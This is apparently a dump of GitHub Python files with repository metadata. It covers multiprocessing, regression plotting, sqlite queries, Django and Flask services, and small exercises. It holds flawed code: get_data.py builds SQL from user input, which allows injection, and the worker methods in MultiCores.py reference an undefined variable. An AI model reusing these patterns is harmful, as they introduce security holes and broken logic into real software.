Process(target=MultiCoreProxy.worker, args=(self.dispatcher,))\n process.start()\n self.Processes.append(process)\n \n self.timeStart = 0.0\n self.timeElapsed = 0.0\n self.timeRemain = 0.0\n self.processTime = { }\n \n # Set some program flags\n self.keepgoing = True\n self.i = 0\n self.j = 0\n \n def run(self):\n \"\"\"\n Run the MultiCoreProxy- start, stop & terminate processes.\n \"\"\"\n if (self.numprocesses == 0):\n sys.stdout.write(' (no extra processes)')\n sys.stdout.write('\\nUnordered results...\\n')\n self.processTasks(self.update)\n if (self.keepgoing):\n sys.stdout.write('Time elapsed: %s\\n' % time.strftime('%M:%S', time.gmtime(self.timeElapsed)))\n if (self.numprocesses > 0):\n sys.stdout.write(\"Waiting for processes to terminate...\")\n self.processTerm()\n \n def processTasks(self, resfunc=None):\n \"\"\"\n Start the execution of tasks by the processes.\n \"\"\"\n self.keepgoing = True\n \n self.timeStart = time.time()\n # Set the initial process time for each\n for n in range(self.numprocesses):\n pid_str = '%d' % self.Processes[n].pid\n self.processTime[pid_str] = 0.0\n \n # Submit first set of tasks\n if (self.numprocesses == 0):\n numprocstart = 1\n else:\n numprocstart = min(self.numprocesses, self.numtasks)\n for self.i in range(numprocstart):\n self.dispatcher.putTask(self.Tasks[self.i])\n \n self.j = -1\n self.i = numprocstart - 1\n while (self.j < self.i):\n # Get and print results\n output = self.getOutput()\n # Execute some function (Yield to a wx.Button event)\n if (isinstance(resfunc, (types.FunctionType, types.MethodType))):\n resfunc(output)\n if ((self.keepgoing) and (self.i + 1 < self.numtasks)):\n # Submit another task\n self.i += 1\n self.dispatcher.putTask(self.Tasks[self.i])\n \n def processStop(self, resfunc=None):\n \"\"\"\n Stop the execution of tasks by the processes.\n \"\"\"\n self.keepgoing = False\n \n while (self.j < self.i):\n # Get and print any results remining in the done queue\n output = self.getOutput()\n if (isinstance(resfunc, (types.FunctionType, types.MethodType))):\n resfunc(output)\n \n def processTerm(self):\n \"\"\"\n Stop the execution of tasks by the processes.\n \"\"\"\n for n in range(self.numprocesses):\n # Terminate any running processes\n self.Processes[n].terminate()\n \n # Wait for all processes to stop\n while (self.anyAlive()):\n time.sleep(0.5)\n \n def anyAlive(self):\n \"\"\"\n Check if any processes are alive.\n \"\"\"\n isalive = False\n for n in range(self.numprocesses):\n isalive = (isalive or self.Processes[n].is_alive())\n return isalive\n \n def getOutput(self):\n \"\"\"\n Get the output from one completed task.\n \"\"\"\n self.j += 1\n \n if (self.numprocesses == 0):\n # Use the single-process method\n self.worker_sp()\n \n output = self.dispatcher.getResult()\n # Calculate the time remaining\n self.timeRemaining(self.j + 1, self.numtasks, output['process']['pid'])\n \n return(output)\n \n def timeRemaining(self, tasknum, numtasks, pid):\n \"\"\"\n Calculate the time remaining for the processes to complete N tasks.\n \"\"\"\n timeNow = time.time()\n self.timeElapsed = timeNow - self.timeStart\n \n pid_str = '%d' % pid\n self.processTime[pid_str] = self.timeElapsed\n \n # Calculate the average time elapsed for all of the processes\n timeElapsedAvg = 0.0\n numprocesses = self.numprocesses\n if (numprocesses == 0): numprocesses = 1\n for pid_str in self.processTime.keys():\n timeElapsedAvg += self.processTime[pid_str]/numprocesses\n self.timeRemain = timeElapsedAvg*(float(numtasks)/float(tasknum) - 1.0)\n \n def update(self, output):\n \"\"\"\n Get and print the results from one completed task.\n \"\"\"\n pass\n \n def worker(cls, dispatcher):\n \"\"\"\n The worker creates a TaskProcessor object to calculate the result.\n \"\"\"\n while True:\n args = dispatcher.getTask()\n taskproc = TaskProcessor(args[0])\n result = taskproc.calculate(args[1])\n # Put the result on the output queue\n dispatcher.putResult(output)\n \n # The multiprocessing worker must not require any existing object for execution!\n worker = classmethod(worker)\n \n def worker_sp(self):\n \"\"\"\n A single-process version of the worker method.\n \"\"\"\n args = self.dispatcher.getTask()\n taskproc = TaskProcessor(args[0])\n result = taskproc.calculate(args[1])\n # Put the result on the output queue\n self.dispatcher.putResult(output)\n","repo_name":"GeoDaCenter/CAST","sub_path":"stars/core/MultiCores.py","file_name":"MultiCores.py","file_ext":"py","file_size_in_byte":7266,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"21"} +{"seq_id":"28679281978","text":"from statistics import mean\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import style\nimport random\n\nstyle.available\nstyle.use('Solarize_Light2')\n# xs= np.array([1,2,3,4,5,6], dtype = np.float64)\n# ys= np.array([5,4,6,5,6,7], dtype= np.float64)\n\n#Defining best fit slope and intercept\n\ndef best_fit_slope_and_intercept(xs,ys):\n \n m= (((mean(xs)*mean(ys))- mean(xs*ys)) / \n ((mean(xs)**2) - mean(xs**2)))\n b= mean(ys)- m* mean(xs)\n return m, b\n\n#calculating squared error function\ndef squared_error(ys_line, ys_orig):\n return sum((ys_line-ys_orig)**2)\n\ndef coefficient_of_determination (ys_line, ys_orig):\n squared_error_regr= squared_error(ys_line, ys_orig)\n y_mean_list = [mean(ys_orig) for _ in ys_orig]\n squared_error_orig = squared_error(ys_orig, y_mean_list)\n return 1 - (squared_error_regr/squared_error_orig)\n\n#Creatong random datasets\n\ndef create_dataset(how_many, variance,step, correlation = False):\n val= 1\n ys= []\n for i in range(how_many):\n ys.append(val+ random.randrange(-variance, +variance))\n \n if correlation=='pos' and correlation :\n val += step\n elif correlation and correlation == 'neg' :\n val -=step\n xs=[i for i in range(len(ys))]\n \n return np.array(xs, dtype= np.float64), np.array(ys, dtype= np.float64)\n\n\nxs,ys = create_dataset(40, 3, 3, correlation = 'pos')\n\n\nm, b= best_fit_slope_and_intercept(xs, ys)\npredict_X= 8\npredictt_Y = (m * predict_X) + b \nregression_line = [m*x +b for x in xs]\n\nprint(m,b)\n\nr_squared = coefficient_of_determination(regression_line, ys)\nprint(r_squared)\n\nplt.scatter(xs,ys,c = 'red')\nplt.plot(xs,regression_line)\nplt.scatter(predict_X,predictt_Y, s=100,color='red')\nplt.show()\n\n\n","repo_name":"anilyavuz/my-ML-projects","sub_path":"Regression model- best fit/best fit.py","file_name":"best fit.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"26616304922","text":"import sqlite3\nimport sys\nimport os\nfrom tabulate import tabulate\n\nsys.path.append('..')\ndb_filename = '../task_18_1/dhcp_snooping.db'\n\n\nargvs = sys.argv[1:]\nargvs_to_db = []\n\ncolumns_list = ['mac', 'ip', 'vlan', 'interface', 'switch']\n\n\ndef get_data(argvs=None):\n db_exists = os.path.exists(db_filename)\n\n if db_exists:\n if argvs != None:\n conn = sqlite3.connect(db_filename)\n result = conn.execute(f'select * from dhcp where {argvs[0]} = \"{argvs[1]}\"')\n display = [row for row in result]\n print(tabulate(display, headers=columns_list))\n\n else:\n conn = sqlite3.connect(db_filename)\n result = conn.execute('select * from dhcp')\n display = [row for row in result]\n print(tabulate(display, headers=columns_list))\n\n else:\n print('Database does not exist')\n\n\nif len(argvs) > 0:\n if len(argvs) != 2:\n print('This script only takes two or none arguments\\n'\n 'in format: \\n'\n 'Columns are: mac, ip, vlan, interface, switch.'\n )\n else:\n if argvs[0] in columns_list:\n argvs_to_db = [argv for argv in argvs]\n get_data(argvs_to_db)\n\n else:\n print('This script only takes two or none arguments\\n'\n 'in format: \\n'\n 'Columns are: mac, ip, vlan, interface, switch.'\n )\n\nelse:\n get_data()","repo_name":"fortredux/py_net_eng","sub_path":"exercises/18_db/task_18_2/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34309121198","text":"from datetime import datetime, timedelta\nfrom django.http import HttpRequest, HttpResponse\nfrom django.utils import simplejson as json\nfrom django.contrib.auth import authenticate, logout\nfrom django.db.models import Q\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom website.utils.httpUtil import HttpRequestProcessor\nfrom website.utils.sessionHelper import SessionHelper\nfrom website.models import Organization, OrganizationMember, RatingCategory, OrganizationRating, Jurisdiction, JurisdictionContributor\nfrom django.contrib.sites.models import Site\nfrom django.contrib.sites.models import get_current_site\n\nfrom django.conf import settings as django_settings\n\ndef get_organization(request):\n requestProcessor = HttpRequestProcessor(request)\n \n output = {}\n output['organizations'] = []\n \n text = requestProcessor.getParameter('text')\n if text == None: \n return HttpResponse(json.dumps(output))\n \n #only if text is at least 2 chars\n if len(text) > 1:\n orgs = Organization.objects.filter(Q(name__icontains=text)).order_by('name')[0:20]\n for org in orgs:\n org_item = {}\n org_item['id'] = org.id\n org_item['name'] = org.name\n output['organizations'].append(org_item)\n \n return HttpResponse(json.dumps(output))\n \ndef set_member(request):\n requestProcessor = HttpRequestProcessor(request)\n \n output = {}\n output['e'] = False\n output['m'] = ''\n \n org_id = requestProcessor.getParameter('org_id')\n if org_id == None: \n output['e'] = True\n output['m'] = 'No org_id provided'\n return HttpResponse(json.dumps(output))\n \n username = requestProcessor.getParameter('username')\n if username == None: \n output['e'] = True\n output['m'] = 'No username provided'\n return HttpResponse(json.dumps(output))\n \n try:\n organization = Organization.objects.get(id=org_id)\n except:\n output['e'] = True\n output['m'] = 'Organization not found.'\n return HttpResponse(json.dumps(output))\n \n try:\n user = User.objects.get(username=username)\n except:\n output['e'] = True\n output['m'] = 'User not found.'\n return HttpResponse(json.dumps(output))\n \n organization.set_member(user)\n \n return HttpResponse(json.dumps(output))\n\ndef delete_organization(request):\n requestProcessor = HttpRequestProcessor(request)\n user = request.user\n \n output = {}\n output['e'] = False\n output['m'] = ''\n \n org_id = requestProcessor.getParameter('org_id')\n if org_id == None: \n output['e'] = True\n output['m'] = 'No org_id provided.'\n return HttpResponse(json.dumps(output))\n \n try:\n organization = Organization.objects.get(id=org_id)\n except:\n output['e'] = True\n output['m'] = 'Organization does not exist.'\n return HttpResponse(json.dumps(output))\n \n try:\n owner = OrganizationMember.objects.get(organization=organization, role__name='Owner', status='A')\n except:\n owner = None\n \n #is user the owner or admin?\n if user.is_staff != True:\n if owner != None:\n if user != owner.user:\n output['e'] = True\n output['m'] = 'You do not have the access right to delete this organization.'\n return HttpResponse(json.dumps(output))\n \n #does org has other members besides owner\n members = OrganizationMember.objects.filter(organization=organization, status='A').exclude(user=owner.user)\n if len(members) > 0:\n output['e'] = True\n output['m'] = 'You cannot delete an organization that has other active members.'\n return HttpResponse(json.dumps(output))\n \n organization.delete()\n output['m'] = 'Organization deleted.'\n return HttpResponse(json.dumps(output))\n\ndef top_org_contributors(request):\n requestProcessor = HttpRequestProcessor(request)\n\n number = requestProcessor.getParameter('number')\n if number == None:\n number = 3\n \n jid = requestProcessor.getParameter('jid')\n if jid != None:\n jurisdiction = Jurisdiction.objects.get(id=jid) \n\n current_site = get_current_site(request)\n\n logo_src = str(current_site.name) + str(django_settings.MEDIA_URL) \n\n top_org_contributors = [] \n rating_category = RatingCategory.objects.get(id=1)\n\n \n if jid == None:\n top_org_contributors_qryset = OrganizationRating.objects.filter(category__exact=rating_category).order_by('-scale')[:number]\n else:\n top_org_contributors_qryset = JurisdictionContributor.objects.filter(jurisdiction__exact=jurisdiction, question_category__isnull=True, user__isnull=True).order_by('-points')[:number]\n\n\n if top_org_contributors_qryset:\n for org in top_org_contributors_qryset:\n top_org_contributor = {}\n top_org_contributor['id'] = org.organization_id\n org = Organization.objects.get(id=org.organization_id)\n top_org_contributor['name'] = org.name\n top_org_contributor['logo_src'] = str(logo_src) + str(org.logo)\n top_org_contributors.append(top_org_contributor)\n\n return HttpResponse(json.dumps(top_org_contributors))\n \n ","repo_name":"solarpermit/solarpermit","sub_path":"website/services/organization_services.py","file_name":"organization_services.py","file_ext":"py","file_size_in_byte":5335,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"1451314490","text":"from flask import Flask, render_template, request, jsonify\n\nfrom prometheus_client import make_wsgi_app\nfrom werkzeug.middleware.dispatcher import DispatcherMiddleware\nfrom werkzeug.serving import run_simple\nfrom flask_prometheus_metrics import register_metrics\n\nimport pymongo\nimport logging\nfrom flask_pymongo import PyMongo\n\nfrom jaeger_client import Config\nfrom flask_opentracing import FlaskTracing\n\napp = Flask(__name__)\n\napp.config[\"MONGO_DBNAME\"] = \"example-mongodb\"\napp.config[\n \"MONGO_URI\"\n] = \"mongodb://example-mongodb-svc.default.svc.cluster.local:27017/example-mongodb\"\n\nmongo = PyMongo(app)\n\ndef init_tracer(service):\n logging.getLogger(\"\").handlers = []\n logging.basicConfig(format=\"%(message)s\", level=logging.DEBUG)\n\n config = Config(\n config={\"sampler\": {\"type\": \"const\", \"param\": 1,}, \"logging\": True, 'reporter_batch_size': 1,},\n service_name=service,\n )\n\n # this call also sets opentracing.tracer\n return config.initialize_tracer()\n\njaeger_tracer = init_tracer(\"backend\")\n\ntracing = FlaskTracing(jaeger_tracer)\n\n# provide app's version and deploy environment/config name to set a gauge metric\nregister_metrics(app, app_version=\"v0.1.2\", app_config=\"staging\")\n\n# Plug metrics WSGI app to your main app with dispatcher\ndispatcher = DispatcherMiddleware(app.wsgi_app, {\"/metrics\": make_wsgi_app()})\n\n@app.route(\"/\")\ndef homepage():\n with jaeger_tracer.start_active_span('homepage') as scope:\n return \"Hello World\"\n\n\n@app.route(\"/api\")\ndef my_api():\n with jaeger_tracer.start_active_span('my_api') as scope:\n answer = \"something\"\n return jsonify(repsonse=answer)\n\n\n@app.route(\"/star\", methods=[\"POST\"])\ndef add_star():\n with jaeger_tracer.start_active_span('add_star') as scope:\n star = mongo.db.stars\n scope.span.log_kv({'event': 'starting mongodb', 'value': star })\n\n name = request.json[\"name\"]\n scope.span.log_kv({'event': 'getting name from request', 'value': name })\n\n distance = request.json[\"distance\"]\n scope.span.log_kv({'event': 'getting distance from request', 'value': distance })\n\n star_id = star.insert({\"name\": name, \"distance\": distance})\n scope.span.log_kv({'event': 'insert into mongodb', 'value': star_id })\n\n new_star = star.find_one({\"_id\": star_id})\n scope.span.log_kv({'event': 'find inserted value', 'value': new_star })\n\n output = {\"name\": new_star[\"name\"], \"distance\": new_star[\"distance\"]}\n scope.span.log_kv({'event': 'output value', 'value': output })\n \n return jsonify({\"result\": output})\n\nrun_simple(hostname=\"0.0.0.0\", port=8080, application=dispatcher)\n\n# if __name__ == \"__main__\":\n# # app.run()\n \n","repo_name":"azzahamdani/udacity-building-metrics-dashbord","sub_path":"reference-app/backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41471299906","text":"\n# Transformar una 'list' con map\n\n# Creamos una list de dict para este ejercicio.\n\nitems = [\n {\n 'product': 'camisa',\n 'price': 100\n },\n {\n 'product': 'pantalones',\n 'price': 400\n },\n {\n 'product': 'sombrero',\n 'price': 600\n }\n]\n\n# Vamos a transformar esta list es una list de numeros.\n\n# Que muestre en una list solo los numeros de los precios.\n\nprices = list(map(lambda item: item['price'], items))\n\nprint(prices)\n\n# Ahora agreguemos un nuevo atributo 'taxes' 'impuestos' a este list o 'array'\n\n# copy() => para copiar el array y asi no tener que modificar el original.\n\ndef add_taxes(item):\n new_item = item.copy()\n new_item['taxes'] = new_item['price'] * .19\n return new_item\n\nnew_items = list(map(add_taxes, items))\n\nprint(new_items)\nprint('Old items')\nprint(items)\n\n\n\n# ejercicio\n'''\ngroup_music = [\n {\n 'Grupo musical': 'blackpink',\n 'cancion': 'savage',\n 'pais': 'japon'\n },\n {\n 'Grupo musical': 'taylor swift',\n 'cancion': 'red',\n 'pais': 'USA'\n },\n {\n 'Grupo musical': 'Linkin Park',\n 'cancion': 'crying',\n 'pais': 'Britanico'\n }\n]\n\ndef add_info(new_info):\n new_info['genero'] = 'rock'\n return new_info\n\nadd_new_info = list(map(add_info, group_music))\nprint(add_new_info)\n'''","repo_name":"Marlon4789/Python-comprehencions","sub_path":"14_map_dict.py","file_name":"14_map_dict.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25184388250","text":"import tkinter as tk\nfrom Source.View.Components.backButton import *\n\n\ndef interface_exported_to_excel(export_to_excel):\n # Interface for displaying completion of export to Excel\n export_to_excel()\n\n exUI = tk.Toplevel()\n exUI.title(\"Exportação Concluída\")\n exUI.geometry(\"800x600\")\n exUI.config(padx=10, pady=100)\n exUI.resizable(width=False, height=False)\n\n header_label = tk.Label(exUI, text=\"Exportação do Arquivo Excel Concluída\", font=(\"Calibri\", 18, \"italic\"))\n header_label.pack(pady=10)\n\n back_button(exUI, exUI.destroy)\n","repo_name":"jotadevss/GFinance","sub_path":"Source/View/exported.py","file_name":"exported.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32718029148","text":"\"\"\" Link Travel Time Models for VehicleTracker \"\"\"\nimport logging\nfrom datetime import datetime\nfrom typing import Any, Dict\nimport json\n\nimport numpy as np\nimport pandas as pd\n\nfrom vehicletracker.helpers.spatial_reference import SpatialRef\nfrom vehicletracker.models.travel_time import TravelTimeModel\n\n_LOGGER = logging.getLogger(__name__)\n\nclass WeeklyHistoricalAverageTravelTime(TravelTimeModel):\n\n def train(self, time : datetime, spatial_ref : SpatialRef, parameters : Dict[str, Any]) -> Dict[str, Any]:\n n_days = parameters.get('nDays', 21)\n data, data_labels = self.travel_time_n_preceding_normal_days(time, n_days, spatial_ref)\n\n df = pd.DataFrame(data)\n df['time'] = pd.to_datetime(df['time'], unit='s')\n\n self.link_refs = np.array(data_labels['linkRef'])\n self.link_ix_lookup = { key: value for value, key in enumerate(self.link_refs) }\n self.travel_time_lookup = []\n \n for link_ix, link_ref in enumerate(self.link_refs):\n ix_hour = np.arange(24)\n ix_weekday = np.arange(7)\n df_link = df[df['linkRef'] == link_ix].drop('linkRef', axis=1)\n df_link['hour'] = df_link['time'].dt.hour\n df_link['weekday'] = df_link['time'].dt.weekday\n matrix = df_link.groupby(['hour', 'weekday'])['travelTime'].mean().unstack(1).reindex(ix_hour, axis=0).reindex(ix_weekday, axis=1)\n matrix = matrix.fillna(method='ffill').fillna(method='bfill').fillna(df_link['travelTime'].mean())\n self.travel_time_lookup.append(matrix)\n\n pred = self.predict({\n 'time': df['time'].astype(str).tolist(),\n 'linkRef': self.link_refs[df['linkRef']].tolist()\n })\n\n return {\n 'loss': np.mean((df['travelTime'] - pred)**2),\n 'spatialRefs': data_labels['linkRef']\n }\n\n def save(self, model_store, metadata):\n config = []\n for link_ix, link_ref in enumerate(self.link_refs):\n config.append({\n 'linkRef': link_ref,\n 'lookup': self.travel_time_lookup[link_ix].values.tolist()\n })\n\n with open(metadata['resourceUrl'] + '/config.json', 'w') as config_file:\n json.dump(config, config_file)\n \n def restore(self, model_store, metadata):\n _LOGGER.info(\"Restoring model '%s'...\", metadata['ref'])\n\n with open(metadata['resourceUrl'] + '/config.json', 'r') as config_file:\n config = json.load(config_file)\n\n self.link_refs = []\n self.travel_time_lookup = []\n\n for link in config:\n ix_hour = np.arange(24)\n ix_weekday = np.arange(7)\n self.link_refs.append(link['linkRef'])\n self.travel_time_lookup.append(pd.DataFrame(data=link['lookup'], index=ix_hour, columns=ix_weekday))\n\n self.link_ix_lookup = { key: value for value, key in enumerate(self.link_refs) }\n\n def predict(self, predict_params):\n # Single prediction\n if 'time' in predict_params and isinstance(predict_params['time'], str):\n time = pd.to_datetime([predict_params['time']])\n link_ix = self.link_ix_lookup[predict_params['linkRef']]\n return self.travel_time_lookup[link_ix].lookup(time.hour, time.weekday)\n # Batch prediction\n elif 'time' in predict_params and isinstance(predict_params['time'], list):\n time = pd.to_datetime(predict_params['time'])\n link_ix = np.array([self.link_ix_lookup[x] for x in predict_params['linkRef']])\n pred = np.empty_like(time, dtype=float) \n for link_ix_, link_ref_ in enumerate(self.link_refs):\n mask = link_ix_ == link_ix\n pred[mask] = self.travel_time_lookup[link_ix_].lookup(time[mask].hour, time[mask].weekday)\n return pred\n else:\n raise ValueError('Unsupported predict parameters: %s', predict_params)\n","repo_name":"niklascp/vehicletracker","sub_path":"vehicletracker/models/WeeklyHistoricalAverageTravelTime.py","file_name":"WeeklyHistoricalAverageTravelTime.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8005093473","text":"import sys\n\nN, M = map(int, input().split())\naij = list(map(list, sys.stdin.read().split()))\naij.reverse()\nwon = [(0, 2*N-i-1) for i in range(N * 2)]\n\nfor j in range(M):\n for k in range(N):\n p1 = k*2\n p2 = k*2+1\n w1, i1 = won[p1]\n w2, i2 = won[p2]\n if aij[i1][j] == aij[i2][j]:\n continue\n if aij[i1][j] == 'G' and aij[i2][j] == 'C':\n won[p1] = (w1+1, i1)\n elif aij[i1][j] == 'G' and aij[i2][j] == 'P':\n won[p2] = (w2+1, i2)\n elif aij[i1][j] == 'C' and aij[i2][j] == 'P':\n won[p1] = (w1+1, i1)\n elif aij[i1][j] == 'C' and aij[i2][j] == 'G':\n won[p2] = (w2+1, i2)\n elif aij[i1][j] == 'P' and aij[i2][j] == 'G':\n won[p1] = (w1+1, i1)\n elif aij[i1][j] == 'P' and aij[i2][j] == 'C':\n won[p2] = (w2+1, i2)\n\n won = sorted(won, reverse=True)\n\nfor _, i in sorted(won, reverse=True):\n print(N*2-i)","repo_name":"makiton/atcoder","sub_path":"abc222/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25689820508","text":"import json\nimport socket\nfrom PyQt5.QtCore import QThread\n\n\nclass connecter(QThread):\n '连接器'\n def __init__(self, BUFSIZ, ADDRESS):\n super(connecter, self).__init__()\n self.BUFSIZ = BUFSIZ # 数据传输时大小\n self.ADDRESS = ADDRESS # 连接地址\n self.command = [] # 用户发出的命令\n self.signal = {} # 各种信号 由窗口给与\n self.topics = [] # 用户关注话题\n self.tcpClientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 真正的 Socket 连接器\n\n def setSignal(self, name, signal):\n '设置信号'\n self.signal[name] = signal\n\n def send(self, msg):\n '发送消息'\n if msg:\n try:\n self.command.append(msg.split(' ')[0]) # 将发送的指令分离出来添加到指令集\n self.tcpClientSocket.send(msg.encode('utf-8'))\n except Exception as e:\n print(e)\n\n def login(self, account: dict):\n '登录'\n self.send('/login {} {}'.format(account['username'], account['password']))\n\n def run(self):\n '接收服务端数据'\n self.tcpClientSocket.connect(self.ADDRESS) # 连接\n try:\n while True:\n # 死循环不断接收\n data = self.tcpClientSocket.recv(self.BUFSIZ).decode('utf-8')\n if data == '/close':\n break\n else:\n # 分析数据 并弹出对应的指令\n self.analysis(self.command.pop(0), data)\n except Exception as e:\n # 非主动断开时报错才打印\n if '你的主机中的软件中止了一个已建立的连接' not in str(e):\n print(e)\n self.tcpClientSocket.close()\n\n def analysis(self, cmd, data):\n '分析数据'\n if cmd == '/login':\n try:\n data = json.loads(data)\n self.topics = data # 保存获取的话题\n if 'default' in self.signal:\n self.signal['default'].emit('登录成功')\n else:\n self.signal['/login'].emit(True)\n except Exception:\n # 如果 json 解析失败发送False信号给登录窗口\n if 'default' in self.signal:\n self.signal['default'].emit('账户或密码错误')\n else:\n self.signal['/login'].emit(False)\n else:\n try:\n jsdata = json.loads(data)\n # 将解析好的 json 数据发送给窗体\n if cmd in self.signal:\n self.signal[cmd].emit(jsdata)\n elif 'default' in self.signal:\n self.signal['default'].emit(data)\n except Exception as e:\n if data == '请先登录':\n if 'default' in self.signal:\n self.signal['default'].emit(data)\n else:\n self.signal['/login'].emit(False)\n print(e, data)\n\n def quit(self):\n '断开连接'\n self.send('/close')\n self.tcpClientSocket.close()\n super().quit()\n","repo_name":"Drelf2018/Liter","sub_path":"Liter_Client/send_receive.py","file_name":"send_receive.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23704901702","text":"list = []\nwhile True:\n n = int(input('Digite um valor: '))\n if n not in list:\n list.append(n)\n print('Número adicionado com sucesso...')\n else:\n print('Valor duplicado, digite novamente...')\n r = str(input('Quer continuar? [S/N] '))\n if r in 'Nn':\n break\nprint('-=' * 30)\nlist.sort()\nprint(f'A sua lista foi {list}')\n","repo_name":"annakesyalima/python","sub_path":"programas/mundo-3/Teste79.py","file_name":"Teste79.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41903999861","text":"import threading\nfrom rest_framework import viewsets, status\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.authentication import SessionAuthentication\nfrom rest_framework.filters import SearchFilter\nfrom pesticide_app.api.serializers import CommentSerializer\nfrom pesticide_app.permissions import CommentorPermissions, AdminOrReadOnlyPermisions\nfrom pesticide_app.models import Comment\nfrom pesticide_app.mailing import new_comment\nfrom slugify import slugify\nfrom pesticide.settings import FRONTEND_URL\n\n\nclass CommentViewSet(viewsets.ModelViewSet):\n serializer_class = CommentSerializer\n queryset = Comment.objects.all()\n permission_classes = [IsAuthenticated & (\n CommentorPermissions | AdminOrReadOnlyPermisions)]\n filter_backends = (SearchFilter, )\n authentication_classes = [SessionAuthentication, ]\n search_fields = ['text']\n\n def create(self, request, *args, **kwargs):\n comment = request.data\n comment['commentor'] = request.user.id\n serializer = CommentSerializer(data=comment)\n if serializer.is_valid():\n self.perform_create(serializer)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def perform_create(self, serializer):\n comment = serializer.save()\n projectPageLink = f\"{FRONTEND_URL}/projects/{slugify(comment.issue.project.name)}/issues/{comment.issue.id}\"\n email_notification = threading.Thread(\n target=new_comment,\n args=(\n comment.issue.project.name,\n projectPageLink,\n comment.issue,\n comment.issue.reporter.name,\n comment.text,\n comment.commentor.name,\n comment.issue.reporter,\n comment.issue.assigned_to,\n comment.issue.project.members.all(),\n )\n )\n email_notification.start()\n","repo_name":"MihirSachdeva/pesticide-docker","sub_path":"pesticide_backend/src/pesticide_app/views/comment/comment.py","file_name":"comment.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"21"} +{"seq_id":"41327898785","text":"'''\n\nCreated on 4 May 2020\n@author: ethancollopy\n\n'''\n\nimport pandas as pd \nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\n\npd.set_option('display.max_rows', None)\npd.set_option('display.max_columns', None)\npd.set_option('display.width', None)\npd.set_option('display.max_colwidth', None)\n\nplt.rcParams.update({'font.serif': 'Times New Roman',\n 'font.size': 10.0,\n 'axes.labelsize': 'Medium',\n 'axes.labelweight': 'normal',\n 'axes.linewidth': 0.8,\n # THIS IS THE IMPORTANT ONE FOR STRETCHING\n # default is [6,4] but...i changed it to\n 'figure.figsize':[16,8] # THIS ONE #\n })\n\n \n#print(data2)\nCountries=['Spain','United Kingdom']\n\n\ncasesData = pd.read_csv(\"/Users/ethancollopy/dev/git/data/COVID19/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv\" , index_col='Country/Region') \ncasesData22 = casesData[casesData['Province/State'].isnull()] \ncasesData2 = casesData22.transpose()\ncasesData3 = casesData2[Countries]\ncasesData4 = casesData3.iloc[150:,:]\n\n# Adding moving average\n#casesData4['pandas_SMA_3'] = casesData3.iloc[:,[0]].rolling(window=3).mean()\n\ncasesData5= casesData3.iloc[:, 1:5]\ncasesData6= casesData5.diff()\n\nax = casesData4.plot(lw=1, colormap='jet', marker='.', markersize=4,title='Covid-19 Cases')\nax.set_xlabel('Date')\nax.set_ylabel('Number of Cases')\nax.set_facecolor('gainsboro')\n\n\nplt.grid()\nplt.savefig('charts/Spain_UK_Jan21.png')\nplt.show()\n\n\n\n\n","repo_name":"scienceMiner/pythonCovid19Charts","sub_path":"python.datascience.views/src/SpainVsUKAfter150Days.py","file_name":"SpainVsUKAfter150Days.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"28707110030","text":"from rest_framework.permissions import BasePermission\nfrom .models import Comments, Contributors, Issues, Projects, Users\n\n\nclass IsAuthenticatedProjectAuthor(BasePermission):\n \"\"\"\n Allow access to the projects view if user is Authenticated\n Project Author car create, get, modify or delete\n Contributors can only get or create\n \"\"\"\n message = 'Editing projects is retricted to the author only!'\n author_methods = ['GET', 'POST', 'PUT', 'DELETE']\n base_methods = ['GET', 'POST']\n\n def has_permission(self, request, view):\n if request.user.is_authenticated:\n return True\n\n def has_object_permission(self, request, view, obj):\n if request.user.is_authenticated:\n contributors = Contributors.objects.filter(project_id=obj.id)\n if request.user == obj.author_user_id:\n if request.method in self.author_methods:\n return True\n elif contributors.get(user_id=request.user) is not None:\n if request.method in self.base_methods:\n return True\n else:\n print(\"you're not this project's author or contributor\")\n\n\nclass IsProjectAuthorOrContributor(BasePermission):\n \"\"\"\n Allow access to the contributors view if user is Authenticated and author or contributor\n Project Author car create, get, modify or delete contributors\n Contributors can only get informations\n \"\"\"\n message = 'you should be authenticated and Author or contributor of an existing project!'\n message_project_not_exist = 'This project does not exist'\n author_object_methods = ['GET', 'POST', 'PUT', 'DELETE']\n contributor_methods = ['GET', ]\n\n def has_permission(self, request, view):\n if 